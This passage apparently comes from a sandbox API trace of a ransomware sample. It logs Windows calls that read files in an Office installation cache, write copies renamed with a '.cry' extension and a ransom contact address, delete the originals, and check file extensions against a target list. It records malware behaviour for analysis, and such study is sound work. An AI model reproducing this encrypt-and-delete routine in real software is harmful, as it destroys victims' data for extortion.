lpBuffer=0x3a60020*, nNumberOfBytesToWrite=0xe8, lpNumberOfBytesWritten=0x2edfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3a60020*, lpNumberOfBytesWritten=0x2edfc9c*=0xe8, lpOverlapped=0x0) returned 1 [0036.077] SetEndOfFile (hFile=0x184) returned 1 [0036.077] CloseHandle (hObject=0x184) returned 1 [0036.078] SetFilePointerEx (in: hFile=0x180, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2edfec8 | out: lpNewFilePointer=0x0) returned 1 [0036.078] SetEndOfFile (hFile=0x180) returned 1 [0036.079] CloseHandle (hObject=0x180) returned 1 [0036.079] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\pss10r.chm.id-9C354B42.[decryptoperator@qq.com].cry", dwFileAttributes=0x2020) returned 1 [0036.080] DeleteFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\pss10r.chm" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\pss10r.chm")) returned 1 [0036.080] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\pss10r.chm") returned 73 [0036.080] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\pss10r.chm") returned 73 [0036.080] lstrlenW (lpString=".doc") returned 4 [0036.080] lstrcmpiW (lpString1=".doc", lpString2=".chm") returned 1 [0036.080] lstrlenW (lpString=".docx") returned 5 [0036.080] lstrcmpiW (lpString1=".docx", lpString2="r.chm") returned -1 [0036.080] lstrlenW (lpString=".pdf") returned 4 [0036.080] lstrcmpiW (lpString1=".pdf", lpString2=".chm") returned 1 [0036.080] lstrlenW (lpString=".xls") returned 4 [0036.080] lstrcmpiW (lpString1=".xls", lpString2=".chm") returned 1 [0036.080] lstrlenW (lpString=".xlsx") returned 5 [0036.080] lstrcmpiW (lpString1=".xlsx", lpString2="r.chm") returned -1 [0036.080] lstrlenW (lpString=".ppt") returned 4 [0036.080] lstrcmpiW (lpString1=".ppt", lpString2=".chm") returned 1 [0036.080] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\pss10r.chm") returned 73 [0036.080] lstrlenW (lpString=".zip") returned 4 [0036.080] lstrcmpiW (lpString1=".zip", lpString2=".chm") returned 1 [0036.080] lstrlenW (lpString=".rar") returned 4 [0036.080] lstrcmpiW (lpString1=".rar", lpString2=".chm") returned 1 [0036.080] lstrlenW (lpString=".bz2") returned 4 [0036.080] lstrcmpiW (lpString1=".bz2", lpString2=".chm") returned -1 [0036.080] lstrlenW (lpString=".7z") returned 3 [0036.080] lstrcmpiW (lpString1=".7z", lpString2="chm") returned -1 [0036.080] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\pss10r.chm") returned 73 [0036.080] lstrlenW (lpString=".dbf") returned 4 [0036.080] lstrcmpiW (lpString1=".dbf", lpString2=".chm") returned 1 [0036.080] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\pss10r.chm") returned 73 [0036.080] lstrlenW (lpString=".1cd") returned 4 [0036.080] lstrcmpiW (lpString1=".1cd", lpString2=".chm") returned -1 [0036.080] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\pss10r.chm") returned 73 [0036.081] lstrlenW (lpString=".jpg") returned 4 [0036.081] lstrcmpiW (lpString1=".jpg", lpString2=".chm") returned 1 [0036.081] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\pss10r.chm") returned 73 [0036.081] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\pss10r.chm") returned 73 [0036.081] lstrlenW (lpString=".doc") returned 4 [0036.081] lstrcmpiW (lpString1=".doc", lpString2=".chm") returned 1 [0036.081] lstrlenW (lpString=".docx") returned 5 [0036.081] lstrcmpiW (lpString1=".docx", lpString2="r.chm") returned -1 [0036.081] lstrlenW (lpString=".pdf") returned 4 [0036.081] lstrcmpiW (lpString1=".pdf", lpString2=".chm") returned 1 [0036.081] lstrlenW (lpString=".xls") returned 4 [0036.081] lstrcmpiW (lpString1=".xls", lpString2=".chm") returned 1 [0036.081] lstrlenW (lpString=".xlsx") returned 5 [0036.081] lstrcmpiW (lpString1=".xlsx", lpString2="r.chm") returned -1 [0036.081] lstrlenW (lpString=".ppt") returned 4 [0036.081] lstrcmpiW (lpString1=".ppt", lpString2=".chm") returned 1 [0036.081] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\pss10r.chm") returned 73 [0036.081] lstrlenW (lpString=".zip") returned 4 [0036.081] lstrcmpiW (lpString1=".zip", lpString2=".chm") returned 1 [0036.081] lstrlenW (lpString=".rar") returned 4 [0036.081] lstrcmpiW (lpString1=".rar", lpString2=".chm") returned 1 [0036.081] lstrlenW (lpString=".bz2") returned 4 [0036.081] lstrcmpiW (lpString1=".bz2", lpString2=".chm") returned -1 [0036.081] lstrlenW (lpString=".7z") returned 3 [0036.081] lstrcmpiW (lpString1=".7z", lpString2="chm") returned -1 [0036.081] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\pss10r.chm") returned 73 [0036.081] lstrlenW (lpString=".dbf") returned 4 [0036.081] lstrcmpiW (lpString1=".dbf", lpString2=".chm") returned 1 [0036.081] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\pss10r.chm") returned 73 [0036.081] lstrlenW (lpString=".1cd") returned 4 [0036.081] lstrcmpiW (lpString1=".1cd", lpString2=".chm") returned -1 [0036.081] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\pss10r.chm") returned 73 [0036.081] lstrlenW (lpString=".jpg") returned 4 [0036.081] lstrcmpiW (lpString1=".jpg", lpString2=".chm") returned 1 [0036.082] lstrcmpiW (lpString1=".chm", lpString2=".cry") returned -1 [0036.082] lstrlenW (lpString="setup.chm") returned 9 [0036.082] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\setup.chm" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\setup.chm"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x180 [0036.082] GetFileSizeEx (in: hFile=0x180, lpFileSize=0x2edff1c | out: lpFileSize=0x2edff1c*=67190) returned 1 [0036.082] CloseHandle (hObject=0x180) returned 1 [0036.082] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\setup.chm" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\setup.chm")) returned 0x2020 [0036.082] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\setup.chm.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\setup.chm.id-9c354b42.[decryptoperator@qq.com].cry")) returned 0xffffffff [0036.082] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\setup.chm" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\setup.chm"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x180 [0036.082] SetFilePointerEx (in: hFile=0x180, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2edfec8 | out: lpNewFilePointer=0x0) returned 1 [0036.082] SetFilePointerEx (in: hFile=0x180, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2edfec8 | out: lpNewFilePointer=0x0) returned 1 [0036.082] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\setup.chm.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\setup.chm.id-9c354b42.[decryptoperator@qq.com].cry"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x184 [0036.082] GetLastError () returned 0x0 [0036.082] ReadFile (in: hFile=0x180, lpBuffer=0x3a60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2edfed4, lpOverlapped=0x0 | out: lpBuffer=0x3a60020*, lpNumberOfBytesRead=0x2edfed4*=0x10676, lpOverlapped=0x0) returned 1 [0036.142] WriteFile (in: hFile=0x184, lpBuffer=0x3a60020*, nNumberOfBytesToWrite=0x10680, lpNumberOfBytesWritten=0x2edfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3a60020*, lpNumberOfBytesWritten=0x2edfc9c*=0x10680, lpOverlapped=0x0) returned 1 [0036.144] ReadFile (in: hFile=0x180, lpBuffer=0x3a60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2edfed4, lpOverlapped=0x0 | out: lpBuffer=0x3a60020*, lpNumberOfBytesRead=0x2edfed4*=0x0, lpOverlapped=0x0) returned 1 [0036.144] WriteFile (in: hFile=0x184, lpBuffer=0x3a60020*, nNumberOfBytesToWrite=0xe6, lpNumberOfBytesWritten=0x2edfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3a60020*, lpNumberOfBytesWritten=0x2edfc9c*=0xe6, lpOverlapped=0x0) returned 1 [0036.144] SetEndOfFile (hFile=0x184) returned 1 [0036.145] CloseHandle (hObject=0x184) returned 1 [0036.146] SetFilePointerEx (in: hFile=0x180, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2edfec8 | out: lpNewFilePointer=0x0) returned 1 [0036.146] SetEndOfFile (hFile=0x180) returned 1 [0036.147] CloseHandle (hObject=0x180) returned 1 [0036.147] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\setup.chm.id-9C354B42.[decryptoperator@qq.com].cry", dwFileAttributes=0x2020) returned 1 [0036.147] DeleteFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\setup.chm" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\setup.chm")) returned 1 [0036.147] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\setup.chm") returned 72 [0036.147] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\setup.chm") returned 72 [0036.148] lstrlenW (lpString=".doc") returned 4 [0036.148] lstrcmpiW (lpString1=".doc", lpString2=".chm") returned 1 [0036.148] lstrlenW (lpString=".docx") returned 5 [0036.148] lstrcmpiW (lpString1=".docx", lpString2="p.chm") returned -1 [0036.148] lstrlenW (lpString=".pdf") returned 4 [0036.148] lstrcmpiW (lpString1=".pdf", lpString2=".chm") returned 1 [0036.148] lstrlenW (lpString=".xls") returned 4 [0036.148] lstrcmpiW (lpString1=".xls", lpString2=".chm") returned 1 [0036.148] lstrlenW (lpString=".xlsx") returned 5 [0036.148] lstrcmpiW (lpString1=".xlsx", lpString2="p.chm") returned -1 [0036.148] lstrlenW (lpString=".ppt") returned 4 [0036.148] lstrcmpiW (lpString1=".ppt", lpString2=".chm") returned 1 [0036.148] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\setup.chm") returned 72 [0036.148] lstrlenW (lpString=".zip") returned 4 [0036.148] lstrcmpiW (lpString1=".zip", lpString2=".chm") returned 1 [0036.148] lstrlenW (lpString=".rar") returned 4 [0036.148] lstrcmpiW (lpString1=".rar", lpString2=".chm") returned 1 [0036.148] lstrlenW (lpString=".bz2") returned 4 [0036.148] lstrcmpiW (lpString1=".bz2", lpString2=".chm") returned -1 [0036.148] lstrlenW (lpString=".7z") returned 3 [0036.148] lstrcmpiW (lpString1=".7z", lpString2="chm") returned -1 [0036.148] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\setup.chm") returned 72 [0036.148] lstrlenW (lpString=".dbf") returned 4 [0036.148] lstrcmpiW (lpString1=".dbf", lpString2=".chm") returned 1 [0036.148] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\setup.chm") returned 72 [0036.148] lstrlenW (lpString=".1cd") returned 4 [0036.148] lstrcmpiW (lpString1=".1cd", lpString2=".chm") returned -1 [0036.148] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\setup.chm") returned 72 [0036.148] lstrlenW (lpString=".jpg") returned 4 [0036.148] lstrcmpiW (lpString1=".jpg", lpString2=".chm") returned 1 [0036.148] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\setup.chm") returned 72 [0036.148] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\setup.chm") returned 72 [0036.148] lstrlenW (lpString=".doc") returned 4 [0036.148] lstrcmpiW (lpString1=".doc", lpString2=".chm") returned 1 [0036.148] lstrlenW (lpString=".docx") returned 5 [0036.148] lstrcmpiW (lpString1=".docx", lpString2="p.chm") returned -1 [0036.148] lstrlenW (lpString=".pdf") returned 4 [0036.149] lstrcmpiW (lpString1=".pdf", lpString2=".chm") returned 1 [0036.149] lstrlenW (lpString=".xls") returned 4 [0036.149] lstrcmpiW (lpString1=".xls", lpString2=".chm") returned 1 [0036.149] lstrlenW (lpString=".xlsx") returned 5 [0036.149] lstrcmpiW (lpString1=".xlsx", lpString2="p.chm") returned -1 [0036.149] lstrlenW (lpString=".ppt") returned 4 [0036.149] lstrcmpiW (lpString1=".ppt", lpString2=".chm") returned 1 [0036.149] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\setup.chm") returned 72 [0036.149] lstrlenW (lpString=".zip") returned 4 [0036.149] lstrcmpiW (lpString1=".zip", lpString2=".chm") returned 1 [0036.149] lstrlenW (lpString=".rar") returned 4 [0036.149] lstrcmpiW (lpString1=".rar", lpString2=".chm") returned 1 [0036.149] lstrlenW (lpString=".bz2") returned 4 [0036.149] lstrcmpiW (lpString1=".bz2", lpString2=".chm") returned -1 [0036.149] lstrlenW (lpString=".7z") returned 3 [0036.149] lstrcmpiW (lpString1=".7z", lpString2="chm") returned -1 [0036.149] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\setup.chm") returned 72 [0036.149] lstrlenW (lpString=".dbf") returned 4 [0036.149] lstrcmpiW (lpString1=".dbf", lpString2=".chm") returned 1 [0036.149] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\setup.chm") returned 72 [0036.149] lstrlenW (lpString=".1cd") returned 4 [0036.149] lstrcmpiW (lpString1=".1cd", lpString2=".chm") returned -1 [0036.149] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\setup.chm") returned 72 [0036.149] lstrlenW (lpString=".jpg") returned 4 [0036.149] lstrcmpiW (lpString1=".jpg", lpString2=".chm") returned 1 [0036.149] lstrcmpiW (lpString1=".xml", lpString2=".cry") returned 1 [0036.149] lstrlenW (lpString="Setup.xml") returned 9 [0036.149] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\setup.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x180 [0036.150] GetFileSizeEx (in: hFile=0x180, lpFileSize=0x2edff1c | out: lpFileSize=0x2edff1c*=9352) returned 1 [0036.150] CloseHandle (hObject=0x180) returned 1 [0036.150] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\setup.xml")) returned 0x2020 [0036.150] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\Setup.xml.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\setup.xml.id-9c354b42.[decryptoperator@qq.com].cry")) returned 0xffffffff [0036.150] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\setup.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x180 [0036.150] SetFilePointerEx (in: hFile=0x180, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2edfec8 | out: lpNewFilePointer=0x0) returned 1 [0036.150] SetFilePointerEx (in: hFile=0x180, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2edfec8 | out: lpNewFilePointer=0x0) returned 1 [0036.150] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\Setup.xml.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\setup.xml.id-9c354b42.[decryptoperator@qq.com].cry"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x184 [0036.150] GetLastError () returned 0x0 [0036.150] ReadFile (in: hFile=0x180, lpBuffer=0x3a60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2edfed4, lpOverlapped=0x0 | out: lpBuffer=0x3a60020*, lpNumberOfBytesRead=0x2edfed4*=0x2488, lpOverlapped=0x0) returned 1 [0036.164] WriteFile (in: hFile=0x184, lpBuffer=0x3a60020*, nNumberOfBytesToWrite=0x2490, lpNumberOfBytesWritten=0x2edfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3a60020*, lpNumberOfBytesWritten=0x2edfc9c*=0x2490, lpOverlapped=0x0) returned 1 [0036.165] ReadFile (in: hFile=0x180, lpBuffer=0x3a60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2edfed4, lpOverlapped=0x0 | out: lpBuffer=0x3a60020*, lpNumberOfBytesRead=0x2edfed4*=0x0, lpOverlapped=0x0) returned 1 [0036.165] WriteFile (in: hFile=0x184, lpBuffer=0x3a60020*, nNumberOfBytesToWrite=0xe6, lpNumberOfBytesWritten=0x2edfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3a60020*, lpNumberOfBytesWritten=0x2edfc9c*=0xe6, lpOverlapped=0x0) returned 1 [0036.165] SetEndOfFile (hFile=0x184) returned 1 [0036.165] CloseHandle (hObject=0x184) returned 1 [0036.165] SetFilePointerEx (in: hFile=0x180, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2edfec8 | out: lpNewFilePointer=0x0) returned 1 [0036.166] SetEndOfFile (hFile=0x180) returned 1 [0036.166] CloseHandle (hObject=0x180) returned 1 [0036.166] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\Setup.xml.id-9C354B42.[decryptoperator@qq.com].cry", dwFileAttributes=0x2020) returned 1 [0036.167] DeleteFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\setup.xml")) returned 1 [0036.167] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0036.167] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0036.167] lstrlenW (lpString=".doc") returned 4 [0036.167] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0036.167] lstrlenW (lpString=".docx") returned 5 [0036.167] lstrcmpiW (lpString1=".docx", lpString2="p.xml") returned -1 [0036.167] lstrlenW (lpString=".pdf") returned 4 [0036.167] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0036.167] lstrlenW (lpString=".xls") returned 4 [0036.167] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0036.167] lstrlenW (lpString=".xlsx") returned 5 [0036.167] lstrcmpiW (lpString1=".xlsx", lpString2="p.xml") returned -1 [0036.167] lstrlenW (lpString=".ppt") returned 4 [0036.167] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0036.167] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0036.167] lstrlenW (lpString=".zip") returned 4 [0036.167] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0036.167] lstrlenW (lpString=".rar") returned 4 [0036.167] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0036.167] lstrlenW (lpString=".bz2") returned 4 [0036.167] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0036.167] lstrlenW (lpString=".7z") returned 3 [0036.167] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0036.167] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0036.167] lstrlenW (lpString=".dbf") returned 4 [0036.167] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0036.168] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0036.168] lstrlenW (lpString=".1cd") returned 4 [0036.168] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0036.168] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0036.168] lstrlenW (lpString=".jpg") returned 4 [0036.168] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0036.168] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0036.168] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0036.168] lstrlenW (lpString=".doc") returned 4 [0036.168] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0036.168] lstrlenW (lpString=".docx") returned 5 [0036.168] lstrcmpiW (lpString1=".docx", lpString2="p.xml") returned -1 [0036.168] lstrlenW (lpString=".pdf") returned 4 [0036.168] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0036.168] lstrlenW (lpString=".xls") returned 4 [0036.168] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0036.168] lstrlenW (lpString=".xlsx") returned 5 [0036.168] lstrcmpiW (lpString1=".xlsx", lpString2="p.xml") returned -1 [0036.168] lstrlenW (lpString=".ppt") returned 4 [0036.168] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0036.168] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0036.168] lstrlenW (lpString=".zip") returned 4 [0036.168] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0036.168] lstrlenW (lpString=".rar") returned 4 [0036.168] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0036.168] lstrlenW (lpString=".bz2") returned 4 [0036.168] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0036.168] lstrlenW (lpString=".7z") returned 3 [0036.168] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0036.168] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0036.168] lstrlenW (lpString=".dbf") returned 4 [0036.168] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0036.169] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0036.169] lstrlenW (lpString=".1cd") returned 4 [0036.169] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0036.169] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0036.169] lstrlenW (lpString=".jpg") returned 4 [0036.169] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0036.169] lstrcmpiW (lpString1=".xml", lpString2=".cry") returned 1 [0036.169] lstrlenW (lpString="AccessMUI.xml") returned 13 [0036.169] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\AccessMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\access.en-us\\accessmui.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x184 [0036.172] GetFileSizeEx (in: hFile=0x184, lpFileSize=0x2edff1c | out: lpFileSize=0x2edff1c*=1349) returned 1 [0036.172] CloseHandle (hObject=0x184) returned 1 [0036.172] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\AccessMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\access.en-us\\accessmui.xml")) returned 0x2020 [0036.172] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\AccessMUI.xml.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\access.en-us\\accessmui.xml.id-9c354b42.[decryptoperator@qq.com].cry")) returned 0xffffffff [0036.173] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\AccessMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\access.en-us\\accessmui.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x184 [0036.173] SetFilePointerEx (in: hFile=0x184, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2edfec8 | out: lpNewFilePointer=0x0) returned 1 [0036.173] SetFilePointerEx (in: hFile=0x184, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2edfec8 | out: lpNewFilePointer=0x0) returned 1 [0036.173] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\AccessMUI.xml.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\access.en-us\\accessmui.xml.id-9c354b42.[decryptoperator@qq.com].cry"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1a0 [0036.173] GetLastError () returned 0x0 [0036.173] ReadFile (in: hFile=0x184, lpBuffer=0x3a60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2edfed4, lpOverlapped=0x0 | out: lpBuffer=0x3a60020*, lpNumberOfBytesRead=0x2edfed4*=0x545, lpOverlapped=0x0) returned 1 [0036.248] WriteFile (in: hFile=0x1a0, lpBuffer=0x3a60020*, nNumberOfBytesToWrite=0x550, lpNumberOfBytesWritten=0x2edfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3a60020*, lpNumberOfBytesWritten=0x2edfc9c*=0x550, lpOverlapped=0x0) returned 1 [0036.249] ReadFile (in: hFile=0x184, lpBuffer=0x3a60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2edfed4, lpOverlapped=0x0 | out: lpBuffer=0x3a60020*, 